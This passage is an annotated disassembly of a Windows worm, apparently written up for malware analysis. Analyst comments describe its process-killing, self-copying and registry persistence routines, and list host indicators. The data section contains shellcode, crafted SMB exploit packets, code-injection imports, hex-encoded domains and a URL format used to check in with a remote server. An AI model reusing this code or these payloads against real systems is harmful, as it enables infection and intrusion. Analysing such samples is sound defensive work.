loc_31422920: ; CODE XREF: sub_314228DB+40j
        push [ebp+arg_4]
        call dword_31421014 ; RegCloseKey
        mov eax, esi

loc_3142292B: ; CODE XREF: sub_314228DB+27j
        pop esi
        pop ebp
        retn
sub_314228DB endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_3142292E(arg_0 = path string) -- terminates running processes by name.
;   Scans the path backwards for the last '\' and uses the text after it as
;   the file name. Walks a process snapshot; for every entry whose name
;   (var_104) is found inside that file name by strstr, the process id at
;   var_120 is opened with access 1F0FFFh and terminated with exit code 0.
;   The arg_0 slot is reused for the snapshot handle, which is not closed.
;   Note the argument order: the snapshot name is the search pattern, so a
;   process whose name is a substring of the file name also matches.

sub_3142292E proc near ; CODE XREF: sub_314229E6+9Fp

var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8

        push ebp
        mov ebp, esp
        sub esp, 128h
        push ebx
        mov ebx, [ebp+arg_0]
        push esi
        push ebx
        call dword_31421084 ; lstrlenA
        mov esi, eax
        dec esi
        test esi, esi
        jle loc_314229E2

loc_3142294E: ; CODE XREF: sub_3142292E+27j
        cmp byte ptr [esi+ebx], 5Ch
        jz short loc_31422957
        dec esi
        jns short loc_3142294E

loc_31422957: ; CODE XREF: sub_3142292E+24j
        push 0
        push 2
        call sub_31422D2C ; CreateToolhelp32Snapshot
        cmp eax, 0FFFFFFFFh
        mov [ebp+arg_0], eax
        jz short loc_314229E2
        push 128h
        lea eax, [ebp+var_128]
        push 0
        push eax
        call sub_31422CD6 ; memset
        add esp, 0Ch
        lea eax, [ebp+var_128]
        mov [ebp+var_128], 128h ; structure size field
        push eax
        push [ebp+arg_0]
        call sub_31422D26 ; Process32First
        test eax, eax
        jz short loc_314229E2
        lea esi, [esi+ebx+1] ; esi = file-name part of the path

loc_3142299F: ; CODE XREF: sub_3142292E+B2j
        lea eax, [ebp+var_104]
        push eax
        push esi
        call dword_31421104 ; strstr
        pop ecx
        test eax, eax
        pop ecx
        jz short loc_314229CF
        push [ebp+var_120]
        push 0
        push 1F0FFFh
        call dword_314210B0 ; OpenProcess
        push 0
        push eax
        call dword_31421060 ; TerminateProcess

loc_314229CF: ; CODE XREF: sub_3142292E+83j
        lea eax, [ebp+var_128]
        push eax
        push [ebp+arg_0]
        call sub_31422D20 ; Process32Next
        test eax, eax
        jnz short loc_3142299F

loc_314229E2: ; CODE XREF: sub_3142292E+1Aj
              ; sub_3142292E+38j ...
        pop esi
        pop ebx
        leave
        retn
sub_3142292E endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_314229E6 -- removes eleven named autostart values and kills the
; programs they point to.
;   For each name in the table var_34 .. var_C, the value is read from the
;   HKLM (80000002h) key named by aSoftwareMicros into var_13C. If it
;   exists, the value is deleted (sub_3142284D) and the process named by its
;   data is terminated (sub_3142292E).
;   NOTE(review): the names look like autostart entries left by other
;   malware (for example "avserve.exe", "Bot Loader") -- an inference from
;   the strings, confirm against family reports.
; Analyst note: on a cleaned host, the sudden absence of these values is
; itself a trace of this routine having run.

sub_314229E6 proc near ; CODE XREF: UPX0:3142237Bp

var_13C = byte ptr -13Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4

        push ebp
        mov ebp, esp
        sub esp, 13Ch
        push ebx
        push esi
        lea eax, [ebp+var_34]
        push edi
        mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager"
        mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter"
        mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service"
        mov [ebp+var_28], offset aBotLoader ; "Bot Loader"
        mov [ebp+var_24], offset aSystray ; "SysTray"
        mov [ebp+var_20], offset aWinupdate ; "WinUpdate"
        mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service"
        mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe"
        mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
        mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13"
        mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update"
        mov [ebp+var_4], eax ; var_4 = cursor into the name table
        mov [ebp+var_8], 0Bh ; var_8 = entries left (11)
        mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
        mov esi, 80000002h

loc_31422A56: ; CODE XREF: sub_314229E6+AEj
        mov eax, [ebp+var_4]
        push 104h
        mov ebx, [eax] ; ebx = current value name
        lea eax, [ebp+var_13C]
        push eax
        push ebx
        push edi
        push esi
        call sub_31422882
        add esp, 14h
        test eax, eax
        jnz short loc_31422A8D
        push ebx
        push edi
        push esi
        call sub_3142284D
        lea eax, [ebp+var_13C]
        push eax
        call sub_3142292E
        add esp, 10h

loc_31422A8D: ; CODE XREF: sub_314229E6+8Ej
        add [ebp+var_4], 4
        dec [ebp+var_8]
        jnz short loc_31422A56
        pop edi
        pop esi
        pop ebx
        leave
        retn
sub_314229E6 endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_31422A9B(arg_0 = old file or NULL, arg_4 = source file) -- installs a
; renamed copy and hands over to it.
;   1. Deletes arg_0 when it is non-NULL.
;   2. Builds a target path in var_78: system directory, the string at
;      dword_314241F8, a random lowercase name of (rand() & 3) + 5 letters
;      and the string at dword_314241F0. dword_31421088 is called as
;      (destination, source) -- presumably a string append; confirm against
;      the import table.
;   3. Copies arg_4 to that path and stores the path as the value
;      "Cryptographic Service" under the HKLM key named by aSoftwareMicros.
;   4. Closes the handle in dword_31424FF4, starts the copy with WinExec
;      (second argument 0), sleeps 1F4h ms and calls ExitProcess(0).
;   Does not return when GetSystemDirectoryA succeeds.
; Analyst note: the "Cryptographic Service" value pointing at a short
; random-named file in the system directory is the persistence artefact.

sub_31422A9B proc near ; CODE XREF: sub_31422B67+D1p
                       ; sub_31422B67+132p

var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch

        push ebp
        mov ebp, esp
        sub esp, 78h
        cmp [ebp+arg_0], 0
        jz short loc_31422AB0
        push [ebp+arg_0]
        call dword_31421074 ; DeleteFileA

loc_31422AB0: ; CODE XREF: sub_31422A9B+Aj
        lea eax, [ebp+var_78]
        push 63h
        push eax
        call dword_3142108C ; GetSystemDirectoryA
        test eax, eax
        jz locret_31422B65
        push esi
        call dword_314210FC ; rand
        and eax, 3
        add eax, 5 ; name length 5..8
        push eax
        lea eax, [ebp+var_14]
        push eax
        call sub_31421F73
        mov esi, dword_31421088
        pop ecx
        pop ecx
        lea eax, [ebp+var_14]
        push offset dword_314241F0
        push eax
        call esi ; dword_31421088
        lea eax, [ebp+var_78]
        push offset dword_314241F8
        push eax
        call esi ; dword_31421088
        lea eax, [ebp+var_14]
        push eax
        lea eax, [ebp+var_78]
        push eax
        call esi ; dword_31421088
        lea eax, [ebp+var_78]
        push 0
        push eax
        push [ebp+arg_4]
        call dword_31421050 ; CopyFileA
        lea eax, [ebp+var_78]
        push eax
        call dword_31421084 ; lstrlenA
        inc eax ; include the terminating zero
        push eax
        lea eax, [ebp+var_78]
        push eax
        push offset aCryptographicS ; "Cryptographic Service"
        push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
        push 80000002h
        call sub_314228DB
        add esp, 14h
        push dword_31424FF4
        call dword_3142107C ; CloseHandle
        lea eax, [ebp+var_78]
        push 0
        push eax
        call dword_31421054 ; WinExec
        push 1F4h
        call dword_31421094 ; Sleep
        push 0
        call dword_314210E0 ; ExitProcess
        pop esi

locret_31422B65: ; CODE XREF: sub_31422A9B+23j
        leave
        retn
sub_31422A9B endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_31422B67 -- install / relocate decision, called once from start-up.
;   var_84 = path of the running module, var_E8 = path stored in the
;   "Cryptographic Service" value, var_20 = stored "ID" value.
;   1. Reads "ID" from HKLM "Software\\Microsoft\\Wireless". If missing, a
;      random lowercase string of (rand() % 0Ah) + 0Ah letters is generated
;      in the aFgnsdrjyrsert buffer and stored as "ID"; otherwise the stored
;      value is copied into that buffer.
;   2. If "Cryptographic Service" is missing: writes "Client" = "1" under
;      the Wireless key and calls sub_31422A9B(NULL, own path).
;   3. If it exists and equals the own path (case-insensitive): when the
;      "Client" value is present, sets dword_31425010 = 1 and deletes it.
;   4. If it exists but differs: sub_31422A9B(stored path, own path), which
;      deletes the old file and installs a fresh copy.
; Analyst note: the "ID" and "Client" values under the Wireless key are
; host indicators taken directly from this listing.

sub_31422B67 proc near ; CODE XREF: UPX0:31422380p

var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h

        push ebp
        mov ebp, esp
        sub esp, 0E8h
        push ebx
        push esi
        push edi
        lea eax, [ebp+var_84]
        push 63h
        push eax
        push 0
        call dword_31421048 ; GetModuleFileNameA
        test eax, eax
        jz loc_31422CA0
        and dword_31425010, 0
        lea eax, [ebp+var_20]
        push 1Dh
        push eax
        mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
        push offset aId ; "ID"
        mov esi, 80000002h
        push edi
        push esi
        call sub_31422882
        add esp, 14h
        test eax, eax
        jz short loc_31422BED
        call dword_314210FC ; rand
        push 0Ah
        mov ebx, offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
        cdq
        pop ecx
        idiv ecx
        add edx, ecx ; length = rand() % 0Ah + 0Ah
        push edx
        push ebx
        call sub_31421F73
        pop ecx
        pop ecx
        push ebx
        call dword_31421084 ; lstrlenA
        inc eax
        push eax
        push ebx
        push offset aId ; "ID"
        push edi
        push esi
        call sub_314228DB
        add esp, 14h
        jmp short loc_31422BFC
; ---------------------------------------------------------------------------

loc_31422BED: ; CODE XREF: sub_31422B67+4Dj
        lea eax, [ebp+var_20]
        push eax
        push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
        call dword_31421068 ; lstrcpyA

loc_31422BFC: ; CODE XREF: sub_31422B67+84j
        lea eax, [ebp+var_E8]
        push 63h
        push eax
        push offset aCryptographicS ; "Cryptographic Service"
        push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
        push esi
        call sub_31422882
        add esp, 14h
        test eax, eax
        jz short loc_31422C42
        push 2
        push offset a1 ; "1"
        push offset aClient ; "Client"
        push edi
        push esi
        call sub_314228DB
        lea eax, [ebp+var_84]
        push eax
        push 0
        call sub_31422A9B
        add esp, 1Ch
        jmp short loc_31422CA0
; ---------------------------------------------------------------------------

loc_31422C42: ; CODE XREF: sub_31422B67+B3j
        lea eax, [ebp+var_84]
        push eax
        lea eax, [ebp+var_E8]
        push eax
        call dword_3142104C ; lstrcmpiA
        test eax, eax
        jnz short loc_31422C8B
        lea eax, [ebp+var_20]
        push 1Dh
        mov ebx, offset aClient ; "Client"
        push eax
        push ebx
        push edi
        push esi
        call sub_31422882
        add esp, 14h
        test eax, eax
        jnz short loc_31422CA0
        push ebx
        push edi
        push esi
        mov dword_31425010, 1
        call sub_3142284D
        add esp, 0Ch
        jmp short loc_31422CA0
; ---------------------------------------------------------------------------

loc_31422C8B: ; CODE XREF: sub_31422B67+F1j
        lea eax, [ebp+var_84]
        push eax
        lea eax, [ebp+var_E8]
        push eax
        call sub_31422A9B
        pop ecx
        pop ecx

loc_31422CA0: ; CODE XREF: sub_31422B67+1Fj
              ; sub_31422B67+D9j ...
        pop edi
        pop esi
        pop ebx
        leave
        retn
sub_31422B67 endp

; =============== S U B R O U T I N E =======================================

sub_31422CA5 proc near ; CODE XREF: sub_314211A0+CAp
                       ; sub_314215C7+11p ...
arg_0 = dword ptr 4 push 4 push 1000h push [esp+8+arg_0] push 0 call dword_31421044 ; VirtualAlloc retn sub_31422CA5 endp ; =============== S U B R O U T I N E ======================================= sub_31422CB9 proc near ; CODE XREF: sub_314211A0+10Bp ; sub_314215C7+C0p arg_0 = dword ptr 4 push 8000h push 0 push [esp+8+arg_0] call dword_31421040 ; VirtualFree retn sub_31422CB9 endp ; --------------------------------------------------------------------------- align 10h loc_31422CD0: ; DATA XREF: sub_31421422+Ao ; sub_314223B2+Ao jmp dword ptr loc_31421100 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422CD6 proc near ; CODE XREF: sub_31421801+128p ; sub_31421801+134p ... jmp dword_314210F8 sub_31422CD6 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422CDC proc near ; CODE XREF: sub_31421801+9Cp ; sub_31421801+C5p ... jmp dword_314210F4 sub_31422CDC endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422CE2 proc near ; CODE XREF: sub_31421801+93p ; sub_31421801+B2p ... 
jmp dword_314210F0 sub_31422CE2 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_31422CF0 proc near ; CODE XREF: sub_31421801+8p arg_0 = byte ptr 4 push ecx cmp eax, 1000h lea ecx, [esp+4+arg_0] jb short loc_31422D10 loc_31422CFC: ; CODE XREF: sub_31422CF0+1Ej sub ecx, 1000h sub eax, 1000h test [ecx], eax cmp eax, 1000h jnb short loc_31422CFC loc_31422D10: ; CODE XREF: sub_31422CF0+Aj sub ecx, eax mov eax, esp test [ecx], eax mov esp, ecx mov ecx, [eax] mov eax, [eax+4] push eax retn sub_31422CF0 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422D20 proc near ; CODE XREF: sub_3142292E+ABp jmp dword_31421064 sub_31422D20 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422D26 proc near ; CODE XREF: sub_3142292E+64p jmp dword_3142105C sub_31422D26 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422D2C proc near ; CODE XREF: sub_3142292E+2Dp jmp dword_31421058 sub_31422D2C endp ; --------------------------------------------------------------------------- db 2 dup(0CCh) dd 4B3h dup(0) dword_31424000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h ; DATA XREF: sub_31421422+112o dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h dd 3072657Ah, 0 aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0 ; DATA XREF: sub_314215C7+84o align 10h byte_31424080 db 0 ; DATA XREF: sub_314216A2+1Br off_31424081 dd offset dword_314241E4 ; DATA XREF: sub_314216A2+23r align 2 dd offset dword_314241D4 dw 0C401h dd 1314241h, 314241B4h, 4241A000h, 41900131h, 80013142h dd 314241h, 31424174h, 42416800h, 
41580131h, 48003142h dd 1314241h, 3142413Ch, 42417400h, 41D40131h, 30003142h dd 314241h, 314241D4h, 42412001h, 41480031h, 10013142h dd 314241h, 31424130h, 42410001h, 40F80131h, 74003142h dd 314241h, 31424130h, 2E767663h, 7572h, 2E777777h, 6C646572h dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh dd 782D7265h, 6D6F632Eh, 0 dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0 dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh dd 75722E6Bh, 0 dword_314241D4 dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_314241E4 dd 617A616Dh, 616B6166h, 75722Ehdword_314241F0 dd 6578652Eh, 0 ; sub_3142207E+55o ... dword_314241F8 dd 5Ch ; sub_31422A9B+56o aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0 ; DATA XREF: sub_314211A0+13o align 10h aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31421316+1Co align 4 aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31421316+Co align 4 aZer0 db 'zer0',0 ; DATA XREF: sub_31421422+34o align 10h aHttpS db 'http://%s',0 ; DATA XREF: sub_314215C7+71o align 4 aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=19&cnt=%s',0 ; DATA XREF: sub_314215C7+57o align 8 byte_314242B8 db 0EBh ; DATA XREF: sub_31421801+24Eo ; sub_31421801+260o ... 
db 58h word_314242BA dw 7468h ; DATA XREF: sub_31422712+40o dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h) dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 
8712FEFDh dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh dd 0 dword_31424580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_31421801+186o dd 0FEFF0000h, 0 dd 2006200h aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0 db 2 db 4Ch ; L db 41h, 4Eh, 4Dh db 41h ; A db 4Eh, 31h, 2Eh db 30h ; 0 align 2 dw 5702h aIndowsForWorkg db 'indows for Workgroups 3.1a',0 db 2 dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh dd 544E0200h, 204D4C20h, 32312E30h, 0 dword_3142460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+1BAo dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0 dd 20000000h, 0 dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h dd 4 dup(0) aWindows2000219: unicode 0, <Windows 2000 2195>,0 aWindows20005_0: unicode 0, <Windows 2000 5.0>,0 align 8 dword_314246B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+1EEo dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0 dd 57000000h, 0 dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h dd 0 dd 47000000h, 0 dd 40000000h, 0 dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h dd 2E0035h, 30h, 0 dword_31424798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+8Do dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h dd 5C0030h, 500049h aC: ; DATA XREF: sub_31421801+BFo unicode 0, <C$>,0 a????? 
db '?????',0 dd 0 dword_314247FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+2D4o dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0 dd 2019Fh, 3 dup(0) dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h dd 0 dword_31424868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+308o dd 4DC0800h, 500800h, 48000010h, 0 dd 4, 2 dup(0) dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h dd 5C0045h, 0 dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0 dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh dd 0 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0 dword_3142490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+4EEo dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0) dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h dd 5C0045h, 0 dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0 dd 3ECh, 0 dword_3142498C dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 138578h, 0E9A65BABh, 0 dword_31424A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+347o dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h dd 8FFFFFFh, 10B800h, 4010B800h, 0 dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h dd 0DADh, 0 dd 0DADh, 0 dword_31424A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+372o dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0) dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h dd 5C0045h, 0 dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0 dword_31424B00 dd 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 3 dup(0) dd 586E6957h, 72502050h, 6Fh, 9 dup(0) db 2 dup(0) dword_31424BBE dd 1004600h dw 1 dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0) dword_31424BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah 
dup(0) ; DATA XREF: sub_31421801+41Bo ; sub_31421801+45Do dd 123C0000h, 751Ch, 0Eh dup(0) ; --------------------------------------------------------------------------- loc_31424C70: ; DATA XREF: sub_31421801+44Ao jmp short loc_31424C78 ; --------------------------------------------------------------------------- jmp short loc_31424C7A ; --------------------------------------------------------------------------- align 8 loc_31424C78: ; CODE XREF: UPX0:loc_31424C70j ; DATA XREF: sub_31421801+5Co pop esp pop esp loc_31424C7A: ; CODE XREF: UPX0:31424C72j and eax, 70695C73h arpl [eax+eax], sp ; --------------------------------------------------------------------------- dw 0 dword_31424C84 dd 1CEC8166h dword_31424C88 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31421D68+62o align 10h aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31421D68+39o align 4 aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31421D68+2Ao align 10h aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31421D68+1Bo align 4 aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31421D68+8o ; sub_314223B2+12Co align 10h aUterm19 db 'uterm19',0 ; DATA XREF: sub_31421DF0:loc_31421ED5o ; UPX0:31422351o ... 
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31421DF0+58o align 4 aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31421DF0:loc_31421E37o align 4 aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31421DF0+34o align 4 aKernel32 db 'kernel32',0 ; DATA XREF: sub_31421DF0+18o align 4 dword_31424D38 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+106o db 0Dh,0Ah db 0Dh,0Ah,0 align 4 aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3142207E+85o db 0Dh,0Ah,0 align 4 aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+71o db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0 align 4 aGet db 'GET',0 ; DATA XREF: sub_3142207E+3Do aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:3142233Co align 4 aUser32 db 'user32',0 ; DATA XREF: sub_314223B2+133o align 4 aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_314223B2+125o align 4 aWininet db 'wininet',0 ; DATA XREF: sub_314223B2+11Eo aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_314223B2+111o align 4 aU19x db 'u19x',0 ; DATA XREF: sub_314223B2+BDo align 4 aU19 db 'u19',0 ; DATA XREF: sub_314223B2+B6o aU18 db 'u18',0 ; DATA XREF: sub_314223B2+AFo aU17 db 'u17',0 ; DATA XREF: sub_314223B2+A8o aU16 db 'u16',0 ; DATA XREF: sub_314223B2+A1o aU15 db 'u15',0 ; DATA XREF: sub_314223B2+9Ao aU14 db 'u14',0 ; DATA XREF: sub_314223B2+93o aU13i db 'u13i',0 ; DATA XREF: sub_314223B2+8Co align 4 aU13 db 'u13',0 ; DATA XREF: sub_314223B2+85o aU12 db 'u12',0 ; DATA XREF: sub_314223B2+7Eo aU11 db 'u11',0 ; DATA XREF: sub_314223B2+77o aU10 db 'u10',0 ; DATA XREF: sub_314223B2+70o aU9 db 'u9',0 ; DATA XREF: sub_314223B2+69o align 4 aU8 db 'u8',0 ; DATA XREF: sub_314223B2+62o align 4 aU18x db 'u18x',0 ; DATA XREF: sub_314223B2+5Bo align 4 aU17x db 'u17x',0 ; DATA XREF: sub_314223B2+54o align 4 aU16x db 'u16x',0 ; DATA XREF: sub_314223B2+4Do align 4 aU15x db 'u15x',0 ; DATA XREF: sub_314223B2+46o align 4 aU14x db 'u14x',0 ; DATA XREF: sub_314223B2+3Fo align 4 aU13x db 
